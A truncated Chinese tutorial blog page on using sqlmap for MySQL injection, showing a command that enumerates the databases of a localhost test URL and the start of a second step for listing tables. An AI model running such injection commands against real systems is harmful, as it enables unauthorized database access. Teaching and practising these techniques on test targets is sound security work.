sqlmap之(四)----Mysql注入實戰

(1) 查找數據庫 [html]  view plain  copy sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs   數據庫有8個。 (2) 通過第一步的數據庫查找表(假如數據庫名爲test) [html]  view plain  copy sqlmap.py -u "http://localhost/sqls/inde
相關文章
相關標籤/搜索